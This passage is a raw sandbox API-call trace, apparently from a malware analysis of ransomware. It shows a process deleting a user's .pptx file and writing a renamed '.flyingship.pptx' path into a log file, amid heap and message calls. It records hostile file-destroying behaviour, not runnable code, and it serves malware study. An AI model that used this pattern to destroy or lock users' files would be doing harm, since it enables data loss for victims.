RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.506] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.506] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.506] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.506] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.506] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.506] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.506] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.506] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.507] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0075.507] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.507] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0075.507] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.507] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.507] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.507] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.507] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.507] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0075.507] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.507] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.507] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.507] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.507] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.507] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.507] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.507] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.507] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.507] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.507] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.507] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.507] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.508] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.508] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.509] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0075.509] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.509] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.509] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\vmwpxwqdquqhtrkz9rx.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0075.509] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.509] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.509] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.510] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.510] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0075.510] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.510] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.510] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.511] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.511] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.511] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.511] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.512] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.512] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0075.512] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.512] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.512] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.512] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.512] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.512] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.513] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.513] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx", nBufferLength=0x7fff, lpBuffer=0x60ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx", lpFilePart=0x0) returned 0x50 [0075.513] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx", lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e4617a0, ftCreationTime.dwHighDateTime=0x1d5e321, ftLastAccessTime.dwLowDateTime=0x787174a0, ftLastAccessTime.dwHighDateTime=0x1d5d7ed, ftLastWriteTime.dwLowDateTime=0xc9c8f580, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x3ec3, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="VmWpxwQdQUQhtrKz9rx.pptx", cAlternateFileName="VMWPXW~1.PPT")) returned 0x6b89f8 [0075.514] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\vmwpxwqdquqhtrkz9rx.pptx")) returned 1 [0075.515] FindNextFileW (in: hFindFile=0x6b89f8, lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e4617a0, ftCreationTime.dwHighDateTime=0x1d5e321, ftLastAccessTime.dwLowDateTime=0x787174a0, ftLastAccessTime.dwHighDateTime=0x1d5d7ed, ftLastWriteTime.dwLowDateTime=0xc9c8f580, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x3ec3, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="VmWpxwQdQUQhtrKz9rx.pptx", cAlternateFileName="VMWPXW~1.PPT")) returned 0 [0075.515] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0075.516] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.517] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.517] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.517] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.517] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.517] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.517] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.517] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.518] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.518] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.518] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eedc | out: lpNewFilePointer=0x0) returned 1 [0075.518] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.518] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.518] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.518] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0075.518] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.519] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.519] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eecc | out: lpNewFilePointer=0x0) returned 1 [0075.519] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x19f, lpOverlapped=0x0) returned 1 [0075.520] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x0, lpOverlapped=0x0) returned 1 [0075.520] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x19f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.520] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.520] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.520] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0075.520] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.520] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.flyingship.pptx\r\n", cchWideChar=94, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 94 [0075.520] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x5e) returned 0x75b820 [0075.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.flyingship.pptx\r\n", cchWideChar=94, lpMultiByteStr=0x75b820, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.flyingship.pptx\r\n", lpUsedDefaultChar=0x0) returned 94 [0075.520] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.520] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x60) returned 0x75b7b8 [0075.520] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b820 | out: hHeap=0x650000) returned 1 [0075.520] WriteFile (in: hFile=0x140, lpBuffer=0x75b7b8*, nNumberOfBytesToWrite=0x5d, lpNumberOfBytesWritten=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x75b7b8*, lpNumberOfBytesWritten=0x61eef4*=0x5d, lpOverlapped=0x0) returned 1 [0075.520] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b7b8 | out: hHeap=0x650000) returned 1 [0075.520] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.520] CloseHandle (hObject=0x140) returned 1 [0075.521] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.521] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.521] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.521] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0075.521] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.521] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.521] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.521] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.521] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0b20 | out: hHeap=0x650000) returned 1 [0075.521] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.521] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0075.522] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0075.522] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69bce0 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.522] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.523] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0075.523] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.523] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.523] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0075.523] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690900 [0075.523] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0075.523] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.523] HeapFree (in: hHeap=0x650000, dwFlags=0x0, 